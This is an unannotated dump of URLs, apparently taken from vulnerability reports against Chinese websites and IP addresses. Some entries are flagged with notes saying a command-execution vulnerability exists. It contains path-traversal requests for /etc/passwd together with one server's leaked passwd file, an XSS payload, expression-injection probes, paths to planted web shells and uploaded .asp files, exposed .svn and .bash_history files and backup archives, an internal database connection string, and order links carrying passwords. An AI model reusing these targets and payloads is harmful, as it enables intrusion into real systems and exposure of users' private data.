jdbc:mysql://10.58.222.48:43306/kubauser?useUnicode=true&characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull http://www.uqee.com/Jobs/info/index/info_id/1 http://bbs.uqee.com http://bbs.uqee.com/convert/ http://bbs.uqee.com/convert/data/config.inc.php http://www.nhcc-cn.com//csccmise/yhgl.asp http://60.190.16.166//csccmise/yhgl.asp 
http://61.175.235.81:88//csccmise/yhgl.asp http://nbrywl.com//csccmise/yhgl.asp http://122.227.235.122//csccmise/yhgl.asp http://www.cclcfs.com:81//csccmise/yhgl.asp http://www.bluedragon.com.cn//csccmise/yhgl.asp http://www.caacts.org.cn/complaint/admin/check.action存在命令执行漏洞 http://mooc.edusoho.com/web.tar.gz http://bbs.taian.com/uc_server/install/ http://news.auto.sina.com.cn/api/news_data.php?length=10&callback=jQuery183014905301271937788_1434975864081&subid=0&dir1=103&page=1&_=1434975878254 http://star.cms.qingting.fm http://60.191.185.102:8081/fgzd.action存在命令执行漏洞 http://hi.mop.com/user/profile/save-basic http://www.0513zc.com/AppRegCmd?appId=126471 http://www.0513zc.com/AppRegCmd?appId=126473 http://www.0513zc.com/AppRegCmd?appId=126474 http://reg.163.com/getpasswd/RetakePassword.jsp http://www.hbagri.gov.cn/tabid/548/Default.aspx http://1.202.195.213/prjsun/ http://1.202.195.213/prjsun/AttachMail/5730f168-43b8-46f0-84c7-317a538752c0201506230944386860.asp http://1.202.195.213/z.txt http://read.html5.qq.com/image?imageUrl=某短链接网址 http://42.120.11.238:8888/x/ http://read.html5.qq.com/image?imageUrl= http://comment5.qq.com/comment_user2.htm?uin=1&uid=11090&ref=&furl= http://115.239.134.126/lhzxExProdProduct.do?action=showsearchaplist&flag=zjWeb http://www.hnedu.cn/.svn/entries m.haodf.com/touch/wxnewsignin/flowdetail?wxPatientReportId=2711861022 http://www.ahchld.gov.cn/ http://www.ahchld.gov.cn/macp/Login.asp http://www.ahchld.gov.cn/UpFiles/Article/2015/6/21/2015062154585345.asp www.2345.com http://www.transdata.cn/ http://218.247.138.157:8081/lky/reportManager_toTableDesign.action?codeCataLogView.resCataLogDir=存在命令执行漏洞 http://www.fotoplace.cc:8082/ http://www.fotoplace.cc:8161/ http://zhenduan.baidu.com/doc/index?md=diagnose_api&app=../../../../../../../../../../../../../../etc/passwd%00 http://ucenter.9game.com/nineday/index.html http://rd2.zhaopin.com/consume/rewardview http://**.**.**/xzxkxjExt/syssp/gs/gs_rehpsl_pub.actiondataid= 
http://www.zjda.com/default/member/memberPersonal!print.shtml?id=203108 http://www.zjda.com/default/member/memberPersonal!print.shtml?id=203109 http://www.zjda.com/default/member/memberPersonal!print.shtml?id=203110 http://www.zjda.com/default/member/memberPersonal!print.shtml?id=203111 http://61.158.214.4/epg/template/template1/zt/64/view_genre_ss.ecgi?genre_selectlist=++director+like+BINARY+%7C%25%B9%B2%C7%E0%CD%C5%D6%D0%D1%EB%25%7C+or++director+like+BINARY+%7C%25%D7%A8%CC%E2%BD%DA%C4%BF%25%7C+&menu_id=&menuid_zy=vcom_2&pinyin=h&clid=&clname=&busiid=&layoutid=&privateid=&appmenutype=&curappmenutype=&channelcode=&chargetype=&turn=1 http://61.158.218.17/epg/template/template1/zt/64/view_genre_ss.ecgi?genre_selectlist=++director+like+BINARY+%7C%25%B9%B2%C7%E0%CD%C5%D6%D0%D1%EB%25%7C+or++director+like+BINARY+%7C%25%D7%A8%CC%E2%BD%DA%C4%BF%25%7C+&menu_id=&menuid_zy=vcom_2&pinyin=h&clid=&clname=&busiid=&layoutid=&privateid=&appmenutype=&curappmenutype=&channelcode=&chargetype=&turn=1 http://61.158.215.201/epg/template/template1/zt/64/view_genre_ss.ecgi?genre_selectlist=++director+like+BINARY+%7C%25%B9%B2%C7%E0%CD%C5%D6%D0%D1%EB%25%7C+or++director+like+BINARY+%7C%25%D7%A8%CC%E2%BD%DA%C4%BF%25%7C+&menu_id=&menuid_zy=vcom_2&pinyin=h&clid=&clname=&busiid=&layoutid=&privateid=&appmenutype=&curappmenutype=&channelcode=&chargetype=&turn=1 http://61.158.215.145/epg/template/template1/zt/64/view_genre_ss.ecgi?genre_selectlist=++director+like+BINARY+%7C%25%B9%B2%C7%E0%CD%C5%D6%D0%D1%EB%25%7C+or++director+like+BINARY+%7C%25%D7%A8%CC%E2%BD%DA%C4%BF%25%7C+&menu_id=&menuid_zy=vcom_2&pinyin=h&clid=&clname=&busiid=&layoutid=&privateid=&appmenutype=&curappmenutype=&channelcode=&chargetype=&turn=1 
http://121.28.7.232/epg/template/template1/zt/64/view_genre_ss.ecgi?genre_selectlist=++director+like+BINARY+%7C%25%B9%B2%C7%E0%CD%C5%D6%D0%D1%EB%25%7C+or++director+like+BINARY+%7C%25%D7%A8%CC%E2%BD%DA%C4%BF%25%7C+&menu_id=&menuid_zy=vcom_2&pinyin=h&clid=&clname=&busiid=&layoutid=&privateid=&appmenutype=&curappmenutype=&channelcode=&chargetype=&turn=1 http://eladies.sina.com.hk/cgi-bin/faq/astrology.cgi?action=view&id=464 http://web.7k7k.com http://kefu.linekong.com http://kefu.linekong.com/eService/system/inputLogin.do?gameId=${99337-10246}&gameMainId=4 http://kefu.linekong.com/eService/system/inputLogin.do?gameId=${application}&gameMainId=4 http://kefu.linekong.com/eService/system/inputLogin.do?gameId=10&gameMainId=${100167-11126 http://kefu.linekong.com/eService/system/inputLogin.do?gameId=10&gameMainId=4${application http://kefu.linekong.com/eService/struts/webconsole.html http://kefu.linekong.com/eService/css/ http://kefu.linekong.com/eService/download/ http://kefu.linekong.com/eService/images/ http://kefu.linekong.com/eService/js/ http://www.shangxueba.com/ask/5470045.html http://221.174.24.96:6088/Latex/latex.action?latex=WT1cbGVmdFx7XGJlZ2lue2FycmF5fXtjY31BJyAm5b2TR18x44CBR18y5ZCM5Li65L2O55S15bmz%0D%0A5pe2IFxc6auY6Zi7ICYg5b2TR18x44CBR18y5Lit5pyJ5LiA5Liq5Li66auY55S15bmz5pe2XGVu%0D%0AZHthcnJheX0%3D http://114.80.79.146:8000/ http://cos.vcyber.com/callcenter/ http://weixin.bluedon.com/bluedon_wx/ www.imooc.com/api2/userloginbyemail http://weirenwu.weibo.com http://210.74.129.34:8000/epro/ebid/viewInvite1.asp?InviteId=0000002852 http://zhaobiao.cdjcc.com/epro/ebid/viewInvite1.asp?InviteId=0000002852 http://caigou.irico.com.cn/Rat/ebid/viewInvite1.asp?InviteId=0000002852 http://eps.myande.com/EPro/ebid/viewInvite1.asp?InviteId=0000002852 http://tycg.jiigoo.com/Rat/ebid/viewInvite1.asp?InviteId=0000002852 http://210.74.129.34:8000/epro/ebid/viewInvite2.asp?InviteId=0000002852 http://zhaobiao.cdjcc.com/epro/ebid/viewInvite2.asp?InviteId=0000002852 
http://caigou.irico.com.cn/Rat/ebid/viewInvite2.asp?InviteId=0000002852 http://eps.myande.com/EPro/ebid/viewInvite2.asp?InviteId=0000002852 http://tycg.jiigoo.com/Rat/ebid/viewInvite2.asp?InviteId=0000002852 http://210.74.129.34:8000/epro/ebid/viewInvite3.asp?InviteId=0000002852 http://zhaobiao.cdjcc.com/epro/ebid/viewInvite3.asp?InviteId=0000002852 http://caigou.irico.com.cn/Rat/ebid/viewInvite3.asp?InviteId=0000002852 http://eps.myande.com/EPro/ebid/viewInvite3.asp?InviteId=0000002852 http://tycg.jiigoo.com/Rat/ebid/viewInvite3.asp?InviteId=0000002852 http://210.74.129.34:8000/epro/ebid/viewInvite4.asp?InviteId=0000002852 http://zhaobiao.cdjcc.com/epro/ebid/viewInvite4.asp?InviteId=0000002852 http://caigou.irico.com.cn/Rat/ebid/viewInvite4.asp?InviteId=0000002852 http://eps.myande.com/EPro/ebid/viewInvite4.asp?InviteId=0000002852 http://tycg.jiigoo.com/Rat/ebid/viewInvite4.asp?InviteId=0000002852 http://210.74.129.34:8000/epro/ebid/viewInvite5.asp?InviteId=0000002852 http://zhaobiao.cdjcc.com/epro/ebid/viewInvite5.asp?InviteId=0000002852 http://caigou.irico.com.cn/Rat/ebid/viewInvite5.asp?InviteId=0000002852 http://eps.myande.com/EPro/ebid/viewInvite5.asp?InviteId=0000002852 http://tycg.jiigoo.com/Rat/ebid/viewInvite5.asp?InviteId=0000002852 http://210.74.129.34:8000/epro/ebid/viewInvite6.asp?InviteId=0000002852 http://zhaobiao.cdjcc.com/epro/ebid/viewInvite6.asp?InviteId=0000002852 http://caigou.irico.com.cn/Rat/ebid/viewInvite6.asp?InviteId=0000002852 http://eps.myande.com/EPro/ebid/viewInvite6.asp?InviteId=0000002852 http://tycg.jiigoo.com/Rat/ebid/viewInvite6.asp?InviteId=0000002852 http://210.74.129.34:8000//epro/EBid/ViewClarify1.asp?InviteId=11 http://zhaobiao.cdjcc.com/epro/EBid/ViewClarify1.asp?InviteId=11 http://caigou.irico.com.cn/Rat/EBid/ViewClarify1.asp?InviteId=11 http://eps.myande.com/EPro/EBid/ViewClarify1.asp?InviteId=11 http://tycg.jiigoo.com/Rat/EBid/ViewClarify1.asp?InviteId=11 http://210.74.129.34:8000//epro/EBid/ViewClarify.asp?InviteId=11 
http://zhaobiao.cdjcc.com/epro/EBid/ViewClarify.asp?InviteId=11 http://caigou.irico.com.cn/Rat/EBid/ViewClarify.asp?InviteId=11 http://eps.myande.com/EPro/EBid/ViewClarify.asp?InviteId=11 http://tycg.jiigoo.com/Rat/EBid/ViewClarify.asp?InviteId=11 http://210.74.129.34:8000/EPro/EBid/AuditForm/AuditForm_ExpertForm.asp?InviteId=11 http://zhaobiao.cdjcc.com/epro/EBid/AuditForm/AuditForm_ExpertForm.asp?InviteId=11 http://caigou.irico.com.cn/Rat/EBid/AuditForm/AuditForm_ExpertForm.asp?InviteId=11 http://eps.myande.com/EPro/EBid/AuditForm/AuditForm_ExpertForm.asp?InviteId=11 http://tycg.jiigoo.com/Rat/EBid/AuditForm/AuditForm_ExpertForm.asp?InviteId=11 http://210.74.129.34:8000/EPro/EBid/AuditForm/ViewAuditInfo.asp?InviteId=11 http://zhaobiao.cdjcc.com/epro/EBid/AuditForm/ViewAuditInfo.asp?InviteId=11 http://caigou.irico.com.cn/Rat/EBid/AuditForm/ViewAuditInfo.asp?InviteId=11 http://eps.myande.com/EPro/EBid/AuditForm/ViewAuditInfo.asp?InviteId=11 http://tycg.jiigoo.com/Rat/EBid/AuditForm/ViewAuditInfo.asp?InviteId=11 http://210.74.129.34:8000/EPro/EBid/clarify/ViewExpertAnswerList.asp?InviteId=11 http://zhaobiao.cdjcc.com/epro/EBid/clarify/ViewExpertAnswerList.asp?InviteId=11 http://caigou.irico.com.cn/Rat/EBid/clarify/ViewExpertAnswerList.asp?InviteId=11 http://eps.myande.com/EPro/EBid/clarify/ViewExpertAnswerList.asp?InviteId=11 http://tycg.jiigoo.com/Rat/EBid/clarify/ViewExpertAnswerList.asp?InviteId=11 http://210.74.129.34:8000/EPro/EBid/clarify/ViewContent.asp?InviteId=11 http://zhaobiao.cdjcc.com/epro/EBid/clarify/ViewContent.asp?InviteId=11 http://caigou.irico.com.cn/Rat/EBid/clarify/ViewContent.asp?InviteId=11 http://eps.myande.com/EPro/EBid/clarify/ViewContent.asp?InviteId=11 http://tycg.jiigoo.com/Rat/EBid/clarify/ViewContent.asp?InviteId=11 http://210.74.129.34:8000/EPro/EBid/ManageBid/CompTech.asp?InviteId=11 http://zhaobiao.cdjcc.com/epro/EBid/ManageBid/CompTech.asp?InviteId=11 http://caigou.irico.com.cn/Rat/EBid/ManageBid/CompTech.asp?InviteId=11 
http://eps.myande.com/EPro/EBid/ManageBid/CompTech.asp?InviteId=11 http://tycg.jiigoo.com/Rat/EBid/ManageBid/CompTech.asp?InviteId=11 http://210.74.129.34:8000/EPro/EBid/ManageBid/CompTech1.asp?InviteId=11 ttp://zhaobiao.cdjcc.com/epro/EBid/ManageBid/CompTech1.asp?InviteId=11 http://caigou.irico.com.cn/Rat/EBid/ManageBid/CompTech1.asp?InviteId=11 http://eps.myande.com/EPro/EBid/ManageBid/CompTech1.asp?InviteId=11 http://tycg.jiigoo.com/Rat/EBid/ManageBid/CompTech1.asp?InviteId=11 http://210.74.129.34:8000/EPro/EBid/ManageBid/DelayInviteTime.asp?InviteId=11 http://zhaobiao.cdjcc.com/epro/EBid/ManageBid/DelayInviteTime.asp?InviteId=11 http://caigou.irico.com.cn/Rat/EBid/ManageBid/DelayInviteTime.asp?InviteId=11 http://eps.myande.com/EPro/EBid/ManageBid/DelayInviteTime.asp?InviteId=11 http://tycg.jiigoo.com/Rat/EBid/ManageBid/DelayInviteTime.asp?InviteId=11 http://210.74.129.34:8000/EPro/EBid/ManageBid/mortagage.asp?InviteId=11 http://zhaobiao.cdjcc.com/epro/EBid/ManageBid/mortagage.asp?InviteId=11 http://caigou.irico.com.cn/Rat/EBid/ManageBid/mortagage.asp?InviteId=11 http://eps.myande.com/EPro/EBid/ManageBid/mortagage.asp?InviteId=11 http://tycg.jiigoo.com/Rat/EBid/ManageBid/mortagage.asp?InviteId=11 http://210.74.129.34:8000/EPro/EBid/ManageBid/openInvite.asp?InviteId=11 http://zhaobiao.cdjcc.com/epro/EBid/ManageBid/openInvite.asp?InviteId=11 http://caigou.irico.com.cn/Rat/EBid/ManageBid/openInvite.asp?InviteId=11 http://eps.myande.com/EPro/EBid/ManageBid/openInvite.asp?InviteId=11 http://tycg.jiigoo.com/Rat/EBid/ManageBid/openInvite.asp?InviteId=11 http://210.74.129.34:8000/EPro/EBid/ManageBid/openBid.asp?InviteId=11 http://zhaobiao.cdjcc.com/epro/EBid/ManageBid/openBid.asp?InviteId=11 http://caigou.irico.com.cn/Rat/EBid/ManageBid/openBid.asp?InviteId=11 http://eps.myande.com/EPro/EBid/ManageBid/openBid.asp?InviteId=11 http://tycg.jiigoo.com/Rat/EBid/ManageBid/openBid.asp?InviteId=11 http://210.74.129.34:8000/EPro/EBid/ManageBid/pmauthBid.asp?InviteId=11 
http://zhaobiao.cdjcc.com/epro/EBid/ManageBid/pmauthBid.asp?InviteId=11 http://caigou.irico.com.cn/Rat/EBid/ManageBid/pmauthBid.asp?InviteId=11 http://eps.myande.com/EPro/EBid/ManageBid/pmauthBid.asp?InviteId=11 http://tycg.jiigoo.com/Rat/EBid/ManageBid/pmauthBid.asp?InviteId=11 http://210.74.129.34:8000/EPro/EBid/ManageBid/QualManage.asp?InviteId=11 http://zhaobiao.cdjcc.com/epro/EBid/ManageBid/QualManage.asp?InviteId=11 http://caigou.irico.com.cn/Rat/EBid/ManageBid/QualManage.asp?InviteId=11 http://eps.myande.com/EPro/EBid/ManageBid/QualManage.asp?InviteId=11 http://tycg.jiigoo.com/Rat/EBid/ManageBid/QualManage.asp?InviteId=11 http://210.74.129.34:8000/EPro/EBid/ManageBid/SelectExpert.asp?InviteId=1 http://zhaobiao.cdjcc.com/epro/EBid/ManageBid/SelectExpert.asp?InviteId=1 http://caigou.irico.com.cn/Rat/EBid/ManageBid/SelectExpert.asp?InviteId=1 http://eps.myande.com/EPro/EBid/ManageBid/SelectExpert.asp?InviteId=1 http://tycg.jiigoo.com/Rat/EBid/ManageBid/SelectExpert.asp?InviteId=1 http://210.74.129.34:8000/EPro/EBid/ManageBid/View_Bid_List.asp?InviteId=11 http://zhaobiao.cdjcc.com/epro/EBid/ManageBid/View_Bid_List.asp?InviteId=11 http://caigou.irico.com.cn/Rat/EBid/ManageBid/View_Bid_List.asp?InviteId=11 http://eps.myande.com/EPro/EBid/ManageBid/View_Bid_List.asp?InviteId=11 http://tycg.jiigoo.com/Rat/EBid/ManageBid/View_Bid_List.asp?InviteId=11 http://210.74.129.34:8000/EPro/EBid/ManageBid/InviteFee_List.asp?SelfDefinedInviteId= http://zhaobiao.cdjcc.com/epro/EBid/ManageBid/InviteFee_List.asp?SelfDefinedInviteId= http://caigou.irico.com.cn/Rat/EBid/ManageBid/InviteFee_List.asp?SelfDefinedInviteId= http://eps.myande.com/EPro/EBid/ManageBid/InviteFee_List.asp?SelfDefinedInviteId= http://tycg.jiigoo.com/Rat/EBid/ManageBid/InviteFee_List.asp?SelfDefinedInviteId= http://210.74.129.34:8000/EPro/EBid/pubInvite/invitePub_finish.asp?InviteId=11 http://zhaobiao.cdjcc.com/epro/EBid/pubInvite/invitePub_finish.asp?InviteId=11 
http://caigou.irico.com.cn/Rat/EBid/pubInvite/invitePub_finish.asp?InviteId=11 http://eps.myande.com/EPro/EBid/pubInvite/invitePub_finish.asp?InviteId=11 http://tycg.jiigoo.com/Rat/EBid/pubInvite/invitePub_finish.asp?InviteId=11 http://118.114.239.38:5555/ http://118.114.239.38:5555/config.asp http://118.114.239.38:8888/tyk/config.asp http://118.114.239.38:808/ http://118.114.239.38:8888/ http://118.114.239.38:5555/config.asp http://login.zk71.com/login.aspx http://login.zk71.com/VIPLogin.aspx exp:fierc https://mail.cdrcb.com/ http://www.hyqss.cn:80/ www.hyqss.cn http://116.213.120.36:8080/login/login.action http://116.213.120.45:8080/login/login.action http://qyba.lnjzfda.gov.cn/list/show.aspx inurl:/opac_two/search2 http://202.200.87.32:1080/opac_two/serials/s_right.jsp?class_no=0 http://222.29.99.40:8080/opac_two/serials/s_right.jsp?class_no=H http://202.196.33.227:8080/opac_two/serials/s_right.jsp?class_no=0 http://opac.cgl.org.cn/opac_two/serials/s_right.jsp?class_no=0 http://219.144.130.220:38080/opac_two/serials/s_right.jsp?class_no=0 http://202.207.193.112:95/opac_two/serials/s_right.jsp?class_no=H http://202.200.87.32:1080/opac_two/search2/searchout.jsp?suchen_match=qx&recordtype=all&suchen_type=1&snumber_type=Y&search_no_type=Y&library_id=all&show_type=wenzi&client_id=web_search&suchen_word=JAVA http://202.196.33.227:8080/opac_two/search2/searchout.jsp?suchen_match=qx&recordtype=all&suchen_type=1&snumber_type=Y&search_no_type=Y&library_id=all&show_type=wenzi&client_id=web_search&suchen_word=JAVA http://opac.cgl.org.cn/opac_two/search2/searchout.jsp?suchen_match=qx&recordtype=all&suchen_type=1&snumber_type=Y&search_no_type=Y&library_id=all&show_type=wenzi&client_id=web_search&suchen_word=%BF%F3%CE%EF http://222.29.99.40:8080/opac_two/search2/searchout.jsp?suchen_match=qx&recordtype=all&suchen_type=1&snumber_type=Y&search_no_type=Y&library_id=all&show_type=wenzi&client_id=web_search&suchen_word=A 
http://219.144.130.220:38080/opac_two/search2/searchout.jsp?suchen_match=qx&recordtype=all&suchen_type=1&snumber_type=Y&search_no_type=Y&library_id=all&show_type=wenzi&client_id=web_search&suchen_word=PHP http://202.207.193.112:95/opac_two/search2/searchout.jsp?suchen_match=qx&recordtype=all&suchen_type=1&snumber_type=Y&search_no_type=Y&library_id=all&show_type=wenzi&client_id=web_search&suchen_word=APP www.caizhimofang.com http://www.caizhimofang.com www.tuniu.com http://mall.263.net http://mall.263.net/User/HistoryOrders.aspx?oid=123&type=2 http://dm.bocins.com/bocins/f/index/mfx/5* http://dm.bocins.com/bocins/f/index/mfx/5*.html http://dm.bocins.com/bocins/F/activate/fid/1* http://www.zhuliangtian.com/search.aspx?kw=1 a01:13PM a03:01PM a05:24PM a01:50PM http://nj.aibang.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://basset.aibang.com/phpinfo.php http://zhidao.baixing.com/ http://zhidao.baixing.com/wp-content/uploads/2015/06/thanks.php http://**.**.**.**/bugs/wooyun-2010-079791 http://kmcrm.komovie.cn/index.php?r=site/login ftp://dongyuan.hiall.com.cn/ http://IP/cgi-bin/reboot.sh http://IP/cgi-bin/ExportSettings.sh http://IP/cgi-bin/upload.cgi http://IP/cgi-bin/upload_bootloader.cgi http://IP/cgi-bin/upload_settings.cgi http://*.*.*.*/goform/wirelessGetSecurity http://*.*.*.*/status.asp http://www.cemc.com.cn/zdww/ http://kczx.sus.edu.cn/G2S/AdminSpace/PublicClass/AddCathedraWare.aspx http://kczx.sus.edu.cn/download/0739834e-c4d0-45bb-94f0-5e51352c7262.asp http://bioinfo.au.tsinghua.edu.cn/member/fzeng/ http://bioinfo.au.tsinghua.edu.cn/member/fzeng/.bash_history http://ebooking.868e.com/Login.Aspx?Url=/Order_List.Aspx http://122.227.189.178/.svn/entries svn://svn.joy.cn/repos/cms/cms-web_1.0/WebRoot svn://svn.joy.cn/repos https://www.koudailc.com/list/list?type=1&status=0&period=2&apr=0 https://www.koudailc.com/list/list?type=1&status=0&period=2&apr=0 https://www.koudailc.com/list/list?type=1&status=0&period=2&apr=0 
http://218.78.217.61:88/ http://ies.hhit.edu.cn/ShowFiles/YQuseList.aspx http://sjjx.jssvc.edu.cn/syjx/share/ShowFiles/YQuseList.aspx http://dqhjsy.nuist.edu.cn/nxdyq/ShowFiles/YQuseList.aspx http://eq.njfu.edu.cn/ShowFiles/YQuseList.aspx http://210.38.64.109/shiyan/share/ShowFiles/YQuseList.aspx http://www.xwb.cdut.edu.cn/admin/ http://**.**.**/evaluation/evaluation/toScoreList.actionidentityNumber= http://wenku.baidu.com/view/97843e9ac281e53a5902ff58.html http://210.75.199.101/mpim/LoginAction.do?action=login http://www.sinopectg.com/user.php?act=get_password http://pop2.shenzhenair.com/data/shell.asp;.jpg http://cw-info.shenzhenair.com/data/shell.asp;.jpg http://cc.263.net/toRegist http://cc.263.net/ajaxAddContactGroups?groupid=69&groupname=%E5%BC%A0%E4%B8%89%E7%9A%84%E7%94%A8%E6%88%B7%E7%BB%841 http://cc.263.net/ajaxDeleteContactGroups?groupid=71 http://cc.263.net/ajaxModifyPerson?addrname=%E7%8E%8B%E4%BA%94&contactids=38208&description=&email=&groupId=72&phonenum=13530018941&phonenum1= http://cc.263.net/deletePerson?contactids=38208 http://cc.263.net/ajaxAddContactGroups?groupid=73&groupname=%E7%BB%84%3Cscript%3Ealert%28/xss/%29%3C/script%3E http://218.213.85.103/cgi-bin/api/sb/hottest_news.cgi?c=../../../../../../../../../../etc/passwd%00&_=1435037199895 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:999:999:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual 
owner:/dev:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:156:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin mysql:x:1000:1000::/home/mysql:/sbin/nologin web:x:99:99::/home/web:/bin/bash www:x:80:99::/home/www:/sbin/nologin ftp_sync:x:1201:99::/usr/home/ftp_sync:/bin/bash sinamgt:x:1202:99::/usr/home/sinamgt:/bin/bash szewai:x:1203:99::/home/szewai:/bin/bash james:x:1204:99::/home/james:/bin/bash kenneth:x:1205:99::/home/kenneth:/bin/bash faiho:x:1206:99::/home/faiho:/bin/bash ice:x:1207:99::/home/ice:/bin/bash winnie:x:1208:99::/home/winnie:/bin/bash kaden:x:1209:99::/home/kaden:/bin/bash nick:x:1210:99::/home/nick:/bin/bash ryan:x:1211:99::/home/ryan:/bin/bash uuidd:x:101:158:UUID daemon:/var/lib/libuuid:/sbin/nologin my3310:x:1212:1000::/data2/mysql3310:/sbin/nologin couchbase:x:102:159:couchbase user:/opt/couchbase:/bin/sh apache:x:48:48:Apache:/var/www:/sbin/nologin distcache:x:94:94:Distcache:/:/sbin/nologin memcached:x:103:160:Memcached daemon:/var/run/memcached:/sbin/nologin tom:x:1213:99::/home/tom:/bin/bash jeremy:x:1214:99::/home/jeremy:/bin/bash heiyik:x:1215:99::/home/heiyik:/bin/bash nagios:x:1216:1216::/home/nagios:/sbin/nologin www.letvcloud.com/video/lists?dosubmit=dosubmit&categoryid=0&isdownload=a&penddate=01/01/1967&pstartdate=01/01/1967&searchcontent=&searchid=&status=0&userid=153658&ut=2 http://124.160.192.198/ http://tms.jiuxian.com/Home/#WaiteToDealIndex 
http://tms.jiuxian.com/Home/#WaiteToDealIndex http://pccsu.suda.edu.cn/web.rar http://english.sinopec.com后面必须加两个/才可以下载 http://english.sinopec.com//web.tar.gz http://101.231.95.27:8091服务器通过扫描端口发现开放着多个端口,进入后发现分别是不同的税务的后台 http://fast.ele.me/ http://fast.ele.me/homepage/LoginHomepage.jsp?hpid=11&isfromportal=1 http://i.gongchang.cn/mod/user/GetPassword/ http://xkyw.bjsf.gov.cn/logon.do?method=logon http://www.myzte.com www.myzte.com http://www.appstar.com.cn http://magazine.tcl.com/article.aspx?id=8491 http://www.to8to.com/new_login.php http://**.**.**.**/order/order_pay.jsp?order_id=3416337&password=341633786084&head=1 http://**.**.**.**/order/order_pay.jsp?order_id=3418539&password=341853942212&head=1 http://**.**.**.**/order/order_pay.jsp?order_id=3418620&password=341862050503&head=1 http://**.**.**.**/order/order_pay.jsp?order_id=3418664&password=341866429820&head=1 http://**.**.**.**/order/order_pay.jsp?order_id=3418720&password=341872048493&head=1 http://**.**.**.**/order/order_pay.jsp?order_id=3418738&password=341873887035&head=1 http://**.**.**.**/order/order_pay.jsp?order_id=3418754&password=341875442491&head=1 http://**.**.**.**/order/order_pay.jsp?order_id=3418804&password=341880454161&head=1 http://**.**.**.**/order/order_pay.jsp?order_id=3418837&password=341883788251&head=1 http://**.**.**.**/order/order_pay.jsp?order_id=3418852&password=341885291263&head=1 http://**.**.**.**/order/pay_redirect.jsp http://**.**.**.**/order/pay_redirect.jsp http://**.**.**.**/order/pay_redirect.jsp http://**.**.**.**/order/pay_redirect.jsp http://**.**.**.**/order/pay_redirect.jsp http://**.**.**.**/order/pay_redirect.jsp http://**.**.**.**/order/pay_redirect.jsp http://**.**.**.**/order/pay_redirect.jsp http://**.**.**.**/order/pay_redirect.jsp http://**.**.**.**/order/pay_redirect.jsp http://**.**.**.**/ajax/home_ajax.jsp?action=goods&cust_id=213006&info_id= http://**.**.**.**/ajax/home_ajax.jsp?action=goods&cust_id=224620&info_id= 
http://**.**.**.**/ajax/home_ajax.jsp?action=goods&cust_id=273012&info_id= http://**.**.**.**/ajax/home_ajax.jsp?action=goods&cust_id=244208&info_id= http://**.**.**.**/ajax/home_ajax.jsp?action=goods&cust_id=273378&info_id= http://**.**.**.**/ajax/home_ajax.jsp?action=goods&cust_id=248488&info_id= http://**.**.**.**/ajax/home_ajax.jsp?action=goods&cust_id=209706&info_id= http://**.**.**.**/ajax/home_ajax.jsp?action=goods&cust_id=195041&info_id= http://**.**.**.**/ajax/home_ajax.jsp?action=goods&cust_id=234339&info_id= http://**.**.**.**/ajax/home_ajax.jsp?action=goods&cust_id=212051&info_id= http://**.**.**.**/list.jsp?tree_id=3&line_class=1&cat=%25u6e5b%25u6c5f%25u3001%25u5e7f%25u897f%25u5317%25u6d77 http://**.**.**.**/list.jsp?tree_id=3&line_class=1&cat=%25u6e5b%25u6c5f%25u3001%25u5e7f%25u897f%25u5317%25u6d77 http://**.**.**.**/list.jsp?tree_id=3&line_class=1&cat=%25u6e5b%25u6c5f%25u3001%25u5e7f%25u897f%25u5317%25u6d77 http://**.**.**.**/list.jsp?tree_id=3&line_class=1&cat=%25u6e5b%25u6c5f%25u3001%25u5e7f%25u897f%25u5317%25u6d77 http://**.**.**.**/list.jsp?tree_id=3&line_class=1&cat=%25u6e5b%25u6c5f%25u3001%25u5e7f%25u897f%25u5317%25u6d77 http://**.**.**.**/list.jsp?tree_id=3&line_class=1&cat=%25u6e5b%25u6c5f%25u3001%25u5e7f%25u897f%25u5317%25u6d77 http://**.**.**.**/list.jsp?tree_id=3&line_class=1&cat=%25u6e5b%25u6c5f%25u3001%25u5e7f%25u897f%25u5317%25u6d77 http://**.**.**.**/list.jsp?tree_id=3&line_class=1&cat=%25u6e5b%25u6c5f%25u3001%25u5e7f%25u897f%25u5317%25u6d77 http://**.**.**.**/list.jsp?tree_id=3&line_class=1&cat=%25u6e5b%25u6c5f%25u3001%25u5e7f%25u897f%25u5317%25u6d77 http://**.**.**.**/list.jsp?tree_id=3&line_class=1&cat=%25u6e5b%25u6c5f%25u3001%25u5e7f%25u897f%25u5317%25u6d77 http://**.**.**.**/order/order_show.jsp?order_id=3416337&password=341633786084 http://**.**.**.**/order/order_show.jsp?order_id=3418539&password=341853942212 http://**.**.**.**/order/order_show.jsp?order_id=3418620&password=341862050503 
